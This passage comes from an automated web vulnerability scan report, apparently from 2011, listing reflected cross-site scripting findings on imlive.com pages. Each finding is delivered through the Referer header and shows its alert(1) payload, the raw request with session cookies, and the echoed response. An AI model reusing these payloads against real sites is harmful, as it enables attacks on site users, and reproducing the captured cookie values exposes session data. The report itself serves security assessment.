type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/&rf=http://www.google.com/search?hl=en^q=e2760'-alert(1)-'c5e2447e511&qs=cat=1^roomid=51&qs=cat=1^roomid=51&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.980. http://imlive.com/live-sex-chats/shy-girl/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shy-girl/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1836d'-alert(1)-'bf279291bec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/shy-girl/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=1836d'-alert(1)-'bf279291bec

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 165183
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/&rf=http://www.google.com/search?hl=en^q=1836d'-alert(1)-'bf279291bec&qs=cat=1^roomid=160&qs=cat=1^roomid=160&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

4.981. http://imlive.com/liveexperts.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/liveexperts.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aed8'><script>alert(1)</script>84ff86f7007 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /liveexperts.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7aed8'><script>alert(1)</script>84ff86f7007

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:45 GMT
Connection: close
Content-Length: 19453
Vary: Accept-Encoding

<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp&lr=1107816009&ud=0&pe=liveexperts.asp&rf=http://www.google.com/search?hl=en^q=7aed8'><script>alert(1)</script>84ff86f7007&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.982. http://imlive.com/localcompanionship.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/localcompanionship.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15f39'><script>alert(1)</script>2c5aaf7e464 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /localcompanionship.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=15f39'><script>alert(1)</script>2c5aaf7e464

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:47 GMT
Connection: close
Content-Length: 16612
Vary: Accept-Encoding

<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp&lr=1107816009&ud=0&pe=localcompanionship.asp&rf=http://www.google.com/search?hl=en^q=15f39'><script>alert(1)</script>2c5aaf7e464&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.983. http://imlive.com/login.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/login.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 266c7'-alert(1)-'ee0d8af970d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /login.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=266c7'-alert(1)-'ee0d8af970d

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:27 GMT
Connection: close
Content-Length: 21496
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=266c7'-alert(1)-'ee0d8af970d&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.984. http://imlive.com/minglesingles.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/minglesingles.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31ad7'><script>alert(1)</script>1b6d1621049 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /minglesingles.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=31ad7'><script>alert(1)</script>1b6d1621049

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:45 GMT
Connection: close
Content-Length: 16176
Vary: Accept-Encoding

<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp&lr=1107816009&ud=0&pe=minglesingles.asp&rf=http://www.google.com/search?hl=en^q=31ad7'><script>alert(1)</script>1b6d1621049&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.985. http://imlive.com/pr.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/pr.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa9af'><script>alert(1)</script>4ba405bce21 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=fa9af'><script>alert(1)</script>4ba405bce21

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:52 GMT
Connection: close
Content-Length: 9919
Vary: Accept-Encoding



<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/pr.asp&lr=1107816009&ud=0&pe=pr.asp&rf=http://www.google.com/search?hl=en^q=fa9af'><script>alert(1)</script>4ba405bce21&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.986. http://imlive.com/preparesearch.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/preparesearch.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198f8'-alert(1)-'996d2f33bb5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /preparesearch.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=198f8'-alert(1)-'996d2f33bb5

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:07 GMT
Connection: close
Content-Length: 18926
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx&rf=http://www.google.com/search?hl=en^q=198f8'-alert(1)-'996d2f33bb5&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.987. http://imlive.com/preparesearch.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/preparesearch.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18795'-alert(1)-'f742b451262 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /preparesearch.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=18795'-alert(1)-'f742b451262

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 18928
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx&rf=http://www.google.com/search?hl=en^q=18795'-alert(1)-'f742b451262&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.988. http://imlive.com/search.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/search.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9024'-alert(1)-'8f7cf0979cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

